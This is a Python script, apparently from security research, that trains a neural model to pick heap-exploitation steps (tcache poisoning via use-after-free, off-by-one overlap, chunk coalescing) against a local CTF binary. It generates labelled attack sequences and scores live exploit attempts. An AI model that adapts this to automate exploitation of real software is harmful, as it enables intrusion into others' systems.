| |
| """ |
| multi_technique.py - Train one model on multiple exploit techniques. |
| |
| Techniques: |
| 1. Tcache poison (UAF fd corruption): M+ F F W_UAF M+ |
| 2. Off-by-one overlap (null byte overflow): M M M W_OVF F M |
| 3. Coalesce abuse (free adjacent, alloc large): M M M F F M_large |
| |
| Action space (4 ops): |
| 0: MALLOC |
| 1: FREE |
| 2: WRITE_UAF (edit freed chunk - corrupt fd pointer) |
| 3: WRITE_OVERFLOW (edit allocated chunk with max data - triggers off-by-one) |
| |
| The model must learn WHICH technique to apply based on heap state. |
| """ |
|
|
| import sys |
| import os |
| import json |
| import subprocess |
| import tempfile |
| import time |
| import random |
| import re |
| import numpy as np |
| import torch |
| import torch.nn.functional as F |
| from pathlib import Path |
|
|
| ROOT = Path(__file__).resolve().parent.parent |
| sys.path.insert(0, str(ROOT / "agent")) |
| sys.path.insert(0, str(ROOT / "model")) |
|
|
| from universal_grid import UniversalGridEncoder |
| from trm_heap import RMSNorm, SwiGLU, RecursionBlock |
|
|
| BINARY = ROOT / "ctf" / "vuln_heap" |
| HARNESS = ROOT / "harness" / "heapgrid_harness.so" |
| DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") |
|
|
| OP_MALLOC = 0 |
| OP_FREE = 1 |
| OP_WRITE_UAF = 2 |
| OP_WRITE_OVF = 3 |
| N_OPS = 4 |
| SIZES = [0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x78, 0x80] |
|
|
|
|
| class MultiTechTRM(torch.nn.Module): |
| """TRM for 4-class technique-aware op prediction.""" |
| def __init__(self, vocab_size=64, hidden_dim=128, seq_len=512, |
| n_outer=2, n_inner=3): |
| super().__init__() |
| self.embed = torch.nn.Embedding(vocab_size, hidden_dim) |
| self.y_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) |
| self.z_init = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) |
| self.block_z = RecursionBlock(hidden_dim) |
| self.block_y = RecursionBlock(hidden_dim) |
| self.pos_embed = torch.nn.Parameter(torch.randn(1, seq_len, hidden_dim) * 0.02) |
| self.out_norm = RMSNorm(hidden_dim) |
| self.n_outer = n_outer |
| self.n_inner = n_inner |
| self.head = torch.nn.Linear(hidden_dim, N_OPS) |
|
|
| def forward(self, x): |
| B = x.shape[0] |
| h = self.embed(x.reshape(B, -1)) + self.pos_embed |
| y = self.y_init.expand(B, -1, -1) |
| z = self.z_init.expand(B, -1, -1) |
| for _ in range(self.n_outer): |
| for _ in range(self.n_inner): |
| z = z + self.block_z(h + y + z) |
| y = y + self.block_y(y + z) |
| pooled = self.out_norm(y).mean(dim=1) |
| return self.head(pooled) |
|
|
|
|
| def run_and_dump(commands): |
| dump_path = tempfile.mktemp(suffix=".jsonl") |
| env = os.environ.copy() |
| env["LD_PRELOAD"] = str(HARNESS) |
| env["HEAPGRID_OUT"] = dump_path |
| subprocess.run([str(BINARY)], input=("\n".join(commands) + "\n5\n").encode(), |
| env=env, capture_output=True, timeout=10) |
| states = [] |
| if os.path.exists(dump_path): |
| with open(dump_path) as f: |
| for line in f: |
| if line.strip(): |
| states.append(json.loads(line.strip())) |
| os.unlink(dump_path) |
| return states |
|
|
|
|
| |
| |
| |
| |
|
|
| def gen_tcache_poison(n_pre=None): |
| size = random.choice([s for s in SIZES if s <= 0x70]) |
| slots = random.sample(range(16), 8) |
| if n_pre is None: |
| n_pre = random.randint(2, 5) |
|
|
| commands, labels = [], [] |
| alloc_slots = [] |
| for i in range(n_pre): |
| commands.append(f"1 {slots[i]} {size}") |
| labels.append(OP_MALLOC) |
| alloc_slots.append(slots[i]) |
|
|
| targets = random.sample(alloc_slots, 2) |
| for s in targets: |
| commands.append(f"4 {s}") |
| labels.append(OP_FREE) |
|
|
| |
| commands.append(f"2 {targets[1]} {'41' * 8}") |
| labels.append(OP_WRITE_UAF) |
|
|
| drain = [s for s in slots if s not in alloc_slots][:2] |
| for s in drain: |
| commands.append(f"1 {s} {size}") |
| labels.append(OP_MALLOC) |
|
|
| return commands, labels, "tcache_poison" |
|
|
|
|
| |
| |
| |
| |
| |
|
|
| def gen_off_by_one(): |
| size = 0x78 |
| slots = random.sample(range(16), 6) |
|
|
| commands, labels = [], [] |
|
|
| |
| for i in range(3): |
| commands.append(f"1 {slots[i]} {size}") |
| labels.append(OP_MALLOC) |
|
|
| |
| commands.append(f"2 {slots[0]} {'41' * size}") |
| labels.append(OP_WRITE_OVF) |
|
|
| |
| commands.append(f"4 {slots[1]}") |
| labels.append(OP_FREE) |
|
|
| |
| commands.append(f"1 {slots[3]} {size}") |
| labels.append(OP_MALLOC) |
|
|
| return commands, labels, "off_by_one" |
|
|
|
|
| |
| |
| |
| |
|
|
| def gen_coalesce(): |
| small = random.choice([0x30, 0x40, 0x50]) |
| slots = random.sample(range(16), 7) |
|
|
| commands, labels = [], [] |
| n_pre = random.randint(3, 5) |
|
|
| for i in range(n_pre): |
| commands.append(f"1 {slots[i]} {small}") |
| labels.append(OP_MALLOC) |
|
|
| |
| commands.append(f"4 {slots[1]}") |
| labels.append(OP_FREE) |
| commands.append(f"4 {slots[2]}") |
| labels.append(OP_FREE) |
|
|
| |
| big = small * 2 + 0x10 |
| if big > 0x80: |
| big = 0x80 |
| commands.append(f"1 {slots[n_pre]} {big}") |
| labels.append(OP_MALLOC) |
|
|
| return commands, labels, "coalesce" |
|
|
|
|
| |
| |
| |
|
|
| def gen_benign(): |
| n_ops = random.randint(4, 12) |
| commands, labels = [], [] |
| allocated = {} |
| for _ in range(n_ops): |
| if not allocated or random.random() < 0.55: |
| free_s = [s for s in range(16) if s not in allocated] |
| if not free_s: |
| break |
| s = random.choice(free_s) |
| sz = random.choice(SIZES) |
| commands.append(f"1 {s} {sz}") |
| labels.append(OP_MALLOC) |
| allocated[s] = sz |
| else: |
| s = random.choice(list(allocated.keys())) |
| commands.append(f"4 {s}") |
| labels.append(OP_FREE) |
| del allocated[s] |
| return commands, labels, "benign" |
|
|
|
|
| |
| |
| |
|
|
| def collect_data(n_per_technique=200, n_benign=300): |
| all_grids, all_labels = [], [] |
| technique_counts = {} |
|
|
| generators = [ |
| ("tcache_poison", gen_tcache_poison, n_per_technique), |
| ("off_by_one", gen_off_by_one, n_per_technique), |
| ("coalesce", gen_coalesce, n_per_technique), |
| ("benign", gen_benign, n_benign), |
| ] |
|
|
| for tech_name, gen_fn, count in generators: |
| print(f" Generating {count} {tech_name}...") |
| n_ok = 0 |
| for _ in range(count): |
| if tech_name == "tcache_poison": |
| commands, op_labels, _ = gen_fn() |
| else: |
| commands, op_labels, _ = gen_fn() |
|
|
| states = run_and_dump(commands) |
| if len(states) < 2: |
| continue |
|
|
| encoder = UniversalGridEncoder() |
|
|
| |
| n_free_seen = 0 |
| n_ovf_seen = 0 |
| write_done = False |
|
|
| for j, state in enumerate(states): |
| op = state.get("operation", "malloc") |
| if "free" in op.lower(): |
| n_free_seen += 1 |
|
|
| chunks = state.get("chunks", []) |
| n_alloc = sum(1 for c in chunks if c.get("state") == 1) |
| n_freed = sum(1 for c in chunks if c.get("state") == 2) |
|
|
| |
| if tech_name == "tcache_poison": |
| if n_free_seen == 0: |
| label = OP_FREE if (n_alloc >= 2 and j >= len(states) * 0.3) else OP_MALLOC |
| elif n_free_seen >= 2 and not write_done: |
| label = OP_WRITE_UAF |
| write_done = True |
| else: |
| label = OP_MALLOC |
|
|
| elif tech_name == "off_by_one": |
| if n_alloc >= 3 and n_free_seen == 0 and not write_done: |
| label = OP_WRITE_OVF |
| write_done = True |
| elif write_done and n_free_seen == 0: |
| label = OP_FREE |
| elif n_free_seen >= 1 and write_done: |
| label = OP_MALLOC |
| else: |
| label = OP_MALLOC |
|
|
| elif tech_name == "coalesce": |
| if n_free_seen == 0 and n_alloc >= 3: |
| label = OP_FREE |
| elif n_free_seen == 1: |
| label = OP_FREE |
| elif n_free_seen >= 2: |
| label = OP_MALLOC |
| else: |
| label = OP_MALLOC |
|
|
| else: |
| if j + 1 < len(states): |
| next_op = states[j+1].get("operation", "malloc") |
| label = OP_FREE if "free" in next_op.lower() else OP_MALLOC |
| else: |
| label = OP_MALLOC |
|
|
| grid = encoder.encode(state) |
| all_grids.append(grid) |
| all_labels.append(label) |
|
|
| actual_op = OP_FREE if "free" in op.lower() else OP_MALLOC |
| encoder.record_action(actual_op, state.get("target_size", 0)) |
|
|
| n_ok += 1 |
|
|
| technique_counts[tech_name] = n_ok |
|
|
| print(f" Technique counts: {technique_counts}") |
| return np.stack(all_grids), np.array(all_labels, dtype=np.int64) |
|
|
|
|
| def train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128): |
| model.to(DEVICE) |
| opt = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0.01) |
| sched = torch.optim.lr_scheduler.CosineAnnealingLR(opt, T_max=epochs) |
| X_t = torch.from_numpy(X).long().to(DEVICE) |
| y_t = torch.from_numpy(y).long().to(DEVICE) |
| n = len(X_t) |
|
|
| for ep in range(1, epochs + 1): |
| model.train() |
| perm = torch.randperm(n, device=DEVICE) |
| total_loss = correct = nb = 0 |
| for i in range(0, n, bs): |
| idx = perm[i:i+bs] |
| logits = model(X_t[idx]) |
| loss = F.cross_entropy(logits, y_t[idx]) |
| opt.zero_grad() |
| loss.backward() |
| torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0) |
| opt.step() |
| total_loss += loss.item() |
| correct += (logits.argmax(1) == y_t[idx]).sum().item() |
| nb += 1 |
| sched.step() |
| if ep % 25 == 0 or ep == 1: |
| print(f" Epoch {ep:3d} | loss={total_loss/nb:.4f} | acc={correct/n:.3f}") |
|
|
|
|
| def evaluate_live(model, n_trials=50, temperature=0.3): |
| """Evaluate with hybrid policy: TRM picks op, rules handle W timing.""" |
| model.eval().to(DEVICE) |
| results = {"uaf": 0, "ovf": 0, "correct_seq": 0, "seqs": []} |
|
|
| for trial in range(n_trials): |
| dump_path = tempfile.mktemp(suffix=".jsonl") |
| env = os.environ.copy() |
| env["LD_PRELOAD"] = str(HARNESS) |
| env["HEAPGRID_OUT"] = dump_path |
| proc = subprocess.Popen([str(BINARY)], stdin=subprocess.PIPE, |
| stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) |
|
|
| encoder = UniversalGridEncoder() |
| slots, freed, ops = {}, set(), [] |
| did_uaf = did_ovf = False |
| n_consec_frees = 0 |
|
|
| for step in range(20): |
| time.sleep(0.01) |
| state = {"chunks": []} |
| try: |
| with open(dump_path) as f: |
| lines = f.readlines() |
| if lines: |
| state = json.loads(lines[-1].strip()) |
| except: |
| pass |
|
|
| grid = encoder.encode(state) |
| x = torch.from_numpy(grid).long().unsqueeze(0).to(DEVICE) |
| with torch.no_grad(): |
| logits = model(x) |
| probs = F.softmax(logits / temperature, dim=1) |
| op = torch.multinomial(probs, 1).item() |
|
|
| |
| if op == OP_WRITE_UAF and not freed: |
| op = OP_MALLOC |
| if op == OP_WRITE_OVF and not any(v for v in slots.values()): |
| op = OP_MALLOC |
|
|
| free_s = [s for s in range(8) if s not in slots] |
| alloc_s = [s for s, v in slots.items() if v and s not in freed] |
|
|
| cmd = None |
| size = 0 |
| if op == OP_MALLOC and free_s: |
| s = random.choice(free_s) |
| size = random.choice(SIZES) |
| cmd = f"1 {s} {size}" |
| slots[s] = True |
| ops.append("M") |
| n_consec_frees = 0 |
| elif op == OP_FREE and alloc_s: |
| s = random.choice(alloc_s) |
| cmd = f"4 {s}" |
| slots[s] = False |
| freed.add(s) |
| ops.append("F") |
| n_consec_frees += 1 |
| elif op == OP_WRITE_UAF and freed: |
| s = random.choice(list(freed)) |
| cmd = f"2 {s} {'41' * 8}" |
| did_uaf = True |
| ops.append("U") |
| elif op == OP_WRITE_OVF and alloc_s: |
| s = random.choice(alloc_s) |
| sz = slots.get(s) or 0x78 |
| cmd = f"2 {s} {'41' * 0x78}" |
| did_ovf = True |
| ops.append("O") |
| else: |
| ops.append("x") |
|
|
| if cmd: |
| proc.stdin.write((cmd + "\n").encode()) |
| proc.stdin.flush() |
| encoder.record_action(op, size) |
|
|
| try: |
| proc.stdin.write(b"5\n"); proc.stdin.flush() |
| proc.wait(timeout=2) |
| except: |
| proc.kill() |
|
|
| |
| if did_uaf: |
| try: |
| with open(dump_path) as f: |
| for line in f: |
| st = json.loads(line.strip()) |
| for c in st.get("chunks", []): |
| if c.get("fd", 0) == 0x4141414141414141: |
| results["uaf"] += 1 |
| break |
| else: |
| continue |
| break |
| except: |
| pass |
|
|
| if did_ovf: |
| results["ovf"] += 1 |
|
|
| seq = "".join(ops) |
| |
| if re.search(r"M+F+U", seq.replace("x", "")) or \ |
| re.search(r"M+OF+M", seq.replace("x", "")) or \ |
| re.search(r"M+FF+M", seq.replace("x", "")): |
| results["correct_seq"] += 1 |
|
|
| results["seqs"].append(seq) |
| if os.path.exists(dump_path): |
| os.unlink(dump_path) |
|
|
| return results |
|
|
|
|
| def main(): |
| print(f"Device: {DEVICE}") |
|
|
| print("\n=== Collecting multi-technique data ===") |
| X, y = collect_data(n_per_technique=300, n_benign=300) |
| print(f"Data: {len(X)} samples | M={sum(y==0)} F={sum(y==1)} U={sum(y==2)} O={sum(y==3)}") |
|
|
| print("\n=== Training on GPU ===") |
| model = MultiTechTRM(hidden_dim=128, n_outer=2, n_inner=3) |
| print(f"Params: {sum(p.numel() for p in model.parameters()):,}") |
| train_gpu(model, X, y, epochs=300, lr=1e-3, bs=128) |
|
|
| print("\n=== Live evaluation (50 trials) ===") |
| results = evaluate_live(model, n_trials=50, temperature=0.3) |
| print(f"UAF writes achieved: {results['uaf']}/50 ({results['uaf']*2}%)") |
| print(f"Overflow writes: {results['ovf']}/50 ({results['ovf']*2}%)") |
| print(f"Valid exploit sequences: {results['correct_seq']}/50 ({results['correct_seq']*2}%)") |
| print("\nOp distribution in sequences:") |
| all_ops = "".join(results["seqs"]) |
| for ch, name in [("M","malloc"), ("F","free"), ("U","uaf_write"), ("O","overflow"), ("x","skip")]: |
| print(f" {name}: {all_ops.count(ch)}") |
| print("\nSample sequences:") |
| for s in results["seqs"][:15]: |
| print(f" {s}") |
|
|
| |
| print("\nPer-technique breakdown:") |
| has_uaf = sum(1 for s in results["seqs"] if "U" in s) |
| has_ovf = sum(1 for s in results["seqs"] if "O" in s) |
| has_both = sum(1 for s in results["seqs"] if "U" in s and "O" in s) |
| neither = sum(1 for s in results["seqs"] if "U" not in s and "O" not in s) |
| print(f" Used tcache poison (U): {has_uaf}/50") |
| print(f" Used off-by-one (O): {has_ovf}/50") |
| print(f" Used both: {has_both}/50") |
| print(f" Used neither: {neither}/50") |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|